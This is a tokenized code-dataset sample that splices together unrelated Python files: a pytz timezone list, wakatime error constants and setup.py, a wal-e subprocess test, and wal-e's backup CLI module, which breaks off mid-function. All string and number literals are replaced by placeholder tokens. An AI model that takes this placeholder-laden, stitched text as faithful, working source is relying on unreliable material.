'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 
'<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> common_timezones = LazyList ( <EOL> tz for tz in common_timezones if tz in all_timezones ) <EOL> common_timezones_set = LazySet ( common_timezones ) </s>
<s> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> API_ERROR = <NUM_LIT> <EOL> CONFIG_FILE_PARSE_ERROR = <NUM_LIT> <EOL> AUTH_ERROR = <NUM_LIT> <EOL> UNKNOWN_ERROR = <NUM_LIT> <EOL> MALFORMED_HEARTBEAT_ERROR = <NUM_LIT> </s>
<s> from setuptools import setup <EOL> from wakatime . __about__ import ( <EOL> __author__ , <EOL> __author_email__ , <EOL> __description__ , <EOL> __license__ , <EOL> __title__ , <EOL> __url__ , <EOL> __version__ , <EOL> ) <EOL> packages = [ <EOL> __title__ , <EOL> ] <EOL> setup ( <EOL> name = __title__ , <EOL> version = __version__ , <EOL> license = __license__ , <EOL> description = __description__ , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = __author__ , <EOL> author_email = __author_email__ , <EOL> url = __url__ , <EOL> packages = packages , <EOL> package_dir = { __title__ : __title__ } , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> ) </s>
<s> import errno <EOL> import os <EOL> import pytest <EOL> from fast_wait import fast_wait <EOL> from wal_e import piper <EOL> from wal_e import subprocess <EOL> assert fast_wait <EOL> def invoke_program ( ) : <EOL> with open ( os . devnull , '<STR_LIT:w>' ) as devnull : <EOL> piper . popen_sp ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = devnull , stderr = devnull ) <EOL> def test_normal ( ) : <EOL> invoke_program ( ) <EOL> class OomTimes ( object ) : <EOL> def __init__ ( self , real , n ) : <EOL> self . real = real <EOL> self . n = n <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> if self . n == <NUM_LIT:0> : <EOL> self . real ( * args , ** kwargs ) <EOL> else : <EOL> self . n -= <NUM_LIT:1> <EOL> e = OSError ( '<STR_LIT>' ) <EOL> e . errno = errno . ENOMEM <EOL> raise e <EOL> def pytest_generate_tests ( metafunc ) : <EOL> if "<STR_LIT>" in metafunc . funcargnames : <EOL> scenarios = [ OomTimes ( subprocess . Popen , n ) for n in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:10> ] ] <EOL> metafunc . parametrize ( "<STR_LIT>" , scenarios ) <EOL> def test_low_mem ( oomtimes , monkeypatch ) : <EOL> monkeypatch . setattr ( subprocess , '<STR_LIT>' , oomtimes ) <EOL> invoke_program ( ) <EOL> def test_advanced_shim ( oomtimes , monkeypatch ) : <EOL> monkeypatch . setattr ( subprocess , '<STR_LIT>' , oomtimes ) <EOL> old_n = oomtimes . n <EOL> def reset ( ) : <EOL> oomtimes . n = old_n <EOL> def invoke ( max_tries ) : <EOL> with open ( os . devnull , '<STR_LIT:w>' ) as devnull : <EOL> popen = piper . PopenShim ( sleep_time = <NUM_LIT:0> , max_tries = max_tries ) <EOL> popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = devnull , stderr = devnull ) <EOL> if oomtimes . n >= <NUM_LIT:1> : <EOL> with pytest . raises ( OSError ) as e : <EOL> invoke ( oomtimes . n - <NUM_LIT:1> ) <EOL> assert e . value . errno == errno . ENOMEM <EOL> else : <EOL> invoke ( oomtimes . n - <NUM_LIT:1> ) <EOL> reset ( ) <EOL> invoke ( oomtimes . 
n ) <EOL> reset ( ) <EOL> invoke ( oomtimes . n + <NUM_LIT:1> ) <EOL> reset ( ) </s>
"""<STR_LIT>"""
# NOTE(review): this file was recovered from a tokenized stream; literal
# placeholders (<STR_LIT>, <NUM_LIT>) stand for the original constants and
# indentation has been reconstructed — confirm against upstream wal-e.
# Python 2 module (uses `print` statement, `except X, e`, httplib).
import sys


def gevent_monkey(*args, **kwargs):
    # Apply gevent cooperative patches before anything else imports the
    # blocking stdlib versions (os, socket w/ DNS, ssl, time).
    import gevent.monkey
    gevent.monkey.patch_os()
    gevent.monkey.patch_socket(dns=True, aggressive=True)
    gevent.monkey.patch_ssl()
    gevent.monkey.patch_time()

gevent_monkey()

if sys.version_info >= (<NUM_LIT:2>, <NUM_LIT:7>):
    def getresponse_monkey():
        # Force a keyword flag on every HTTPConnection.getresponse call
        # (only available on Python >= 2.7, hence the version gate).
        import httplib
        original = httplib.HTTPConnection.getresponse

        def monkey(*args, **kwargs):
            kwargs['<STR_LIT>'] = True
            return original(*args, **kwargs)

        httplib.HTTPConnection.getresponse = monkey

    getresponse_monkey()


def ssl_monkey():
    # Pin a keyword argument (presumably the ssl_version) on every
    # ssl.wrap_socket call — TODO confirm which key the placeholder hides.
    import ssl
    original = ssl.wrap_socket

    def wrap_socket_monkey(*args, **kwargs):
        kwargs['<STR_LIT>'] = '<STR_LIT>'
        return original(*args, **kwargs)

    ssl.wrap_socket = wrap_socket_monkey

ssl_monkey()

# Deliberately late imports: they must run *after* the monkeypatching above.
import argparse
import logging
import os
import re
import textwrap
import traceback

from wal_e import log_help
from wal_e import subprocess
from wal_e.exception import UserCritical
from wal_e.exception import UserException
from wal_e import storage
from wal_e.piper import popen_sp
from wal_e.worker.pg import PSQL_BIN, psql_csv_run
from wal_e.pipeline import LZOP_BIN, PV_BIN, GPG_BIN
from wal_e.worker.pg import CONFIG_BIN, PgControlDataParser

log_help.configure(
    format='<STR_LIT>')

logger = log_help.WalELogger('<STR_LIT>')


def external_program_check(
        to_check=frozenset([PSQL_BIN, LZOP_BIN, PV_BIN])):
    """<STR_LIT>"""
    # Probe each required external binary; collect failures and raise one
    # aggregated UserException rather than failing on the first.
    could_not_run = []
    error_msgs = []

    def psql_err_handler(popen):
        # psql ran but exited non-zero: record a human-readable message
        # and abort the probe via EnvironmentError (caught below).
        assert popen.returncode != <NUM_LIT:0>
        error_msgs.append(textwrap.fill(
            '<STR_LIT>'
            '<STR_LIT>'))
        raise EnvironmentError('<STR_LIT>'
                               '<STR_LIT>')

    with open(os.devnull, '<STR_LIT:w>') as nullf:
        for program in to_check:
            try:
                if program is PSQL_BIN:
                    # psql needs a real query round-trip to prove it works.
                    psql_csv_run('<STR_LIT>', error_handler=psql_err_handler)
                else:
                    if program is PV_BIN:
                        extra_args = ['<STR_LIT>']
                    else:
                        extra_args = []
                    # Launch with all output discarded; closing stdin lets
                    # the probe process exit immediately.
                    proc = popen_sp([program] + extra_args,
                                    stdout=nullf, stderr=nullf,
                                    stdin=subprocess.PIPE)
                    proc.stdin.close()
                    proc.wait()
            except EnvironmentError:
                # Binary missing or not executable.
                could_not_run.append(program)

    if could_not_run:
        error_msgs.append(
            '<STR_LIT>' +
            '<STR_LIT:U+002CU+0020>'.join(could_not_run))

    if error_msgs:
        raise UserException(
            '<STR_LIT>',
            '<STR_LIT:\n>'.join(error_msgs))

    return None


def extract_segment(text_with_extractable_segment):
    # Parse a WAL segment (log, seg) pair out of free text using the
    # backup-name regexp; returns None when the text does not match.
    from wal_e.storage import BASE_BACKUP_REGEXP
    from wal_e.storage.base import SegmentNumber

    match = re.match(BASE_BACKUP_REGEXP, text_with_extractable_segment)
    if match is None:
        return None
    else:
        groupdict = match.groupdict()
        return SegmentNumber(log=groupdict['<STR_LIT>'],
                             seg=groupdict['<STR_LIT>'])


def build_parser():
    # Construct the full wal-e CLI: global options plus one subparser per
    # subcommand (version, backup-fetch/push/list, wal-fetch/push/prefetch,
    # delete with its own sub-subcommands).
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=__doc__)

    # AWS credential sources are mutually exclusive: explicit key id vs.
    # instance-profile flag.
    aws_group = parser.add_mutually_exclusive_group()
    aws_group.add_argument('<STR_LIT>', '<STR_LIT>',
                           help='<STR_LIT>'
                                '<STR_LIT>'
                                '<STR_LIT>'
                                '<STR_LIT>')
    aws_group.add_argument('<STR_LIT>', action='<STR_LIT:store_true>',
                           help='<STR_LIT>'
                                '<STR_LIT>'
                                '<STR_LIT>')
    parser.add_argument('<STR_LIT>', '<STR_LIT>',
                        help='<STR_LIT>'
                             '<STR_LIT>'
                             '<STR_LIT>'
                             '<STR_LIT>')
    parser.add_argument('<STR_LIT>',
                        help='<STR_LIT>'
                             '<STR_LIT>'
                             '<STR_LIT>')
    parser.add_argument('<STR_LIT>',
                        help='<STR_LIT>'
                             '<STR_LIT>'
                             '<STR_LIT>')
    parser.add_argument(
        '<STR_LIT>',
        help='<STR_LIT>'
             '<STR_LIT>'
             '<STR_LIT>')
    parser.add_argument(
        '<STR_LIT>', action='<STR_LIT:store_true>',
        help='<STR_LIT>')

    subparsers = parser.add_subparsers(title='<STR_LIT>',
                                       dest='<STR_LIT>')

    # Shared parents so fetch/push pairs stay option-compatible.
    backup_fetchpush_parent = argparse.ArgumentParser(add_help=False)
    backup_fetchpush_parent.add_argument('<STR_LIT>',
                                         help="<STR_LIT>"
                                              "<STR_LIT>")
    backup_fetchpush_parent.add_argument(
        '<STR_LIT>', '<STR_LIT>', type=int, default=<NUM_LIT:4>,
        help='<STR_LIT>')

    subparsers.add_parser('<STR_LIT:version>', help='<STR_LIT>')

    backup_list_nodetail_parent = argparse.ArgumentParser(add_help=False)

    wal_fetchpush_parent = argparse.ArgumentParser(add_help=False)
    wal_fetchpush_parent.add_argument('<STR_LIT>',
                                      help='<STR_LIT>')

    backup_fetch_parser = subparsers.add_parser(
        '<STR_LIT>', help='<STR_LIT>',
        parents=[backup_fetchpush_parent, backup_list_nodetail_parent])
    backup_list_parser = subparsers.add_parser(
        '<STR_LIT>', parents=[backup_list_nodetail_parent],
        help='<STR_LIT>')
    backup_push_parser = subparsers.add_parser(
        '<STR_LIT>', help='<STR_LIT>',
        parents=[backup_fetchpush_parent])
    backup_push_parser.add_argument(
        '<STR_LIT>',
        help='<STR_LIT>'
             '<STR_LIT>', dest='<STR_LIT>',
        metavar='<STR_LIT>',
        type=int, default=None)
    backup_push_parser.add_argument(
        '<STR_LIT>',
        help=('<STR_LIT>'
              '<STR_LIT>'
              '<STR_LIT>'),
        dest='<STR_LIT>',
        action='<STR_LIT:store_true>',
        default=False)

    wal_push_parser = subparsers.add_parser(
        '<STR_LIT>', help='<STR_LIT>',
        parents=[wal_fetchpush_parent])
    wal_push_parser.add_argument(
        '<STR_LIT>', '<STR_LIT>', type=int, default=<NUM_LIT:8>,
        help='<STR_LIT>')

    backup_fetch_parser.add_argument('<STR_LIT>',
                                     help='<STR_LIT>')
    backup_fetch_parser.add_argument(
        '<STR_LIT>',
        help='<STR_LIT>',
        dest='<STR_LIT>',
        action='<STR_LIT:store_true>',
        default=False)
    backup_fetch_parser.add_argument(
        '<STR_LIT>',
        help=('<STR_LIT>'
              '<STR_LIT>'),
        type=str,
        default=None)

    backup_list_parser.add_argument(
        '<STR_LIT>', nargs='<STR_LIT:?>', default=None,
        help='<STR_LIT>')
    backup_list_parser.add_argument(
        '<STR_LIT>', default=False, action='<STR_LIT:store_true>',
        help='<STR_LIT>')

    wal_fetch_parser = subparsers.add_parser(
        '<STR_LIT>', help='<STR_LIT>',
        parents=[wal_fetchpush_parent])
    wal_fetch_parser.add_argument('<STR_LIT>',
                                  help='<STR_LIT>')
    wal_fetch_parser.add_argument(
        '<STR_LIT>', '<STR_LIT>', type=int, default=<NUM_LIT:8>,
        help='<STR_LIT>')

    wal_prefetch_parser = subparsers.add_parser('<STR_LIT>',
                                                help='<STR_LIT>')
    wal_prefetch_parser.add_argument(
        '<STR_LIT>',
        help='<STR_LIT>')
    wal_prefetch_parser.add_argument('<STR_LIT>',
                                     help='<STR_LIT>')

    delete_parser = subparsers.add_parser(
        '<STR_LIT>', help='<STR_LIT>')
    delete_parser.add_argument('<STR_LIT>', '<STR_LIT>', action='<STR_LIT:store_true>',
                               help=('<STR_LIT>'
                                     '<STR_LIT>'))
    delete_parser.add_argument('<STR_LIT>', action='<STR_LIT:store_true>',
                               help=('<STR_LIT>'
                                     '<STR_LIT>'
                                     '<STR_LIT>'))

    delete_subparsers = delete_parser.add_subparsers(
        title='<STR_LIT>',
        description=('<STR_LIT>'
                     '<STR_LIT>'),
        dest='<STR_LIT>')

    delete_before_parser = delete_subparsers.add_parser(
        '<STR_LIT>', help=('<STR_LIT>'
                           '<STR_LIT>'
                           '<STR_LIT>'))
    delete_before_parser.add_argument(
        '<STR_LIT>',
        help='<STR_LIT>')

    delete_retain_parser = delete_subparsers.add_parser(
        '<STR_LIT>', help=('<STR_LIT>'
                           '<STR_LIT>'
                           '<STR_LIT>'))
    delete_retain_parser.add_argument(
        '<STR_LIT>', type=int,
        help='<STR_LIT>')

    delete_subparsers.add_parser(
        '<STR_LIT>',
        help=('<STR_LIT>'
              '<STR_LIT>'
              '<STR_LIT>'
              '<STR_LIT>'))
    delete_subparsers.add_parser(
        '<STR_LIT>',
        help=('<STR_LIT>'
              '<STR_LIT>'
              '<STR_LIT>'))

    return parser


def _config_hint_generate(optname, both_env_and_param):
    """<STR_LIT>"""
    # Build a user-facing hint naming the environment variable (and,
    # optionally, the equivalent --option) for a missing setting.
    env = optname.replace('<STR_LIT:->', '<STR_LIT:_>').upper()

    if both_env_and_param:
        option = '<STR_LIT>' + optname.lower()
        return ('<STR_LIT>'
                .format(option, env))
    else:
        return '<STR_LIT>'.format(env)


def s3_explicit_creds(args):
    # Resolve explicit AWS credentials: CLI flag first, then environment;
    # missing key or secret raises a hint-carrying UserException.
    access_key = args.aws_access_key_id or os.getenv('<STR_LIT>')
    if access_key is None:
        raise UserException(
            msg='<STR_LIT>',
            hint=(_config_hint_generate('<STR_LIT>', True)))

    secret_key = os.getenv('<STR_LIT>')
    if secret_key is None:
        raise UserException(
            msg='<STR_LIT>',
            hint=_config_hint_generate('<STR_LIT>', False))

    # Optional STS session token.
    security_token = os.getenv('<STR_LIT>')

    from wal_e.blobstore import s3
    return s3.Credentials(access_key, secret_key, security_token)


def s3_instance_profile(args):
    # EC2 instance-profile credentials; caller must have passed the flag.
    from wal_e.blobstore import s3
    assert args.aws_instance_profile
    return s3.InstanceProfileCredentials()


def configure_backup_cxt(args):
    # Choose a storage prefix (CLI args, then environment) and build the
    # matching backend operator (S3, WABS, or Swift) with GPG support.
    prefix = (args.s3_prefix or args.wabs_prefix
              or os.getenv('<STR_LIT>') or os.getenv('<STR_LIT>')
              or os.getenv('<STR_LIT>'))
    if prefix is None:
        raise UserException(
            msg='<STR_LIT>',
            hint=(
                '<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>'
            )
        )

    store = storage.StorageLayout(prefix)

    # GPG encryption is optional; verify the binary only when a key is set.
    gpg_key_id = args.gpg_key_id or os.getenv('<STR_LIT>')
    if gpg_key_id is not None:
        external_program_check([GPG_BIN])

    if store.is_s3:
        if args.aws_instance_profile:
            creds = s3_instance_profile(args)
        else:
            creds = s3_explicit_creds(args)
        from wal_e.blobstore import s3
        s3.sigv4_check_apply()
        from wal_e.operator import s3_operator
        return s3_operator.S3Backup(store, creds, gpg_key_id)
    elif store.is_wabs:
        account_name = args.wabs_account_name or os.getenv('<STR_LIT>')
        if account_name is None:
            raise UserException(
                msg='<STR_LIT>',
                hint=_config_hint_generate('<STR_LIT>', True))
        # Either an access key or an access token suffices for WABS.
        access_key = os.getenv('<STR_LIT>')
        access_token = os.getenv('<STR_LIT>')
        if not (access_key or access_token):
            raise UserException(
                msg='<STR_LIT>',
                hint=(
                    '<STR_LIT>'
                    '<STR_LIT>'
                ))
        from wal_e.blobstore import wabs
        from wal_e.operator.wabs_operator import WABSBackup
        creds = wabs.Credentials(account_name, access_key, access_token)
        return WABSBackup(store, creds, gpg_key_id)
    elif store.is_swift:
        # Swift credentials come entirely from the environment; the last
        # two getenv calls carry defaults.
        from wal_e.blobstore import swift
        from wal_e.operator.swift_operator import SwiftBackup
        creds = swift.Credentials(
            os.getenv('<STR_LIT>'),
            os.getenv('<STR_LIT>'),
            os.getenv('<STR_LIT>'),
            os.getenv('<STR_LIT>'),
            os.getenv('<STR_LIT>'),
            os.getenv('<STR_LIT>', '<STR_LIT>'),
            os.getenv('<STR_LIT>', '<STR_LIT:2>'),
        )
        return SwiftBackup(store, creds, gpg_key_id)
    else:
        # StorageLayout accepted the prefix but no backend matched: a bug.
        raise UserCritical(
            msg='<STR_LIT>',
            hint='<STR_LIT>')


def monkeypatch_tarfile_copyfileobj():
    """<STR_LIT>"""
    # Swap tarfile's byte copier for wal-e's own implementation.
    import tarfile
    from wal_e import copyfileobj
    tarfile.copyfileobj = copyfileobj.copyfileobj


def render_subcommand(args):
    """<STR_LIT>"""
    # For `delete`, include the delete sub-subcommand in the rendering.
    if args.subcommand == '<STR_LIT>':
        return '<STR_LIT>' + args.delete_subcommand
    else:
        return args.subcommand


def main():
    # CLI entry point: parse args, build the backend context, and dispatch
    # to the subcommand handler.  Exit codes: 1 user error, 2 internal.
    parser = build_parser()
    args = parser.parse_args()
    subcommand = args.subcommand

    if args.terse:
        log_help.set_level(logging.WARNING)

    if subcommand == '<STR_LIT:version>':
        import pkgutil
        # Python 2 print statement.
        print pkgutil.get_data('<STR_LIT>', '<STR_LIT>').strip()
        sys.exit(<NUM_LIT:0>)

    logger.info(msg='<STR_LIT>',
                detail=('<STR_LIT>'
                        .format(render_subcommand(args))))

    try:
        backup_cxt = configure_backup_cxt(args)

        if subcommand == '<STR_LIT>':
            monkeypatch_tarfile_copyfileobj()
            external_program_check([LZOP_BIN])
            backup_cxt.database_fetch(
                args.PG_CLUSTER_DIRECTORY,
                args.BACKUP_NAME,
                blind_restore=args.blind_restore,
                restore_spec=args.restore_spec,
                pool_size=args.pool_size)
        elif subcommand == '<STR_LIT>':
            backup_cxt.backup_list(query=args.QUERY, detail=args.detail)
        elif subcommand == '<STR_LIT>':
            monkeypatch_tarfile_copyfileobj()
            if args.while_offline:
                # Offline mode: psql is unnecessary, but pg_controldata
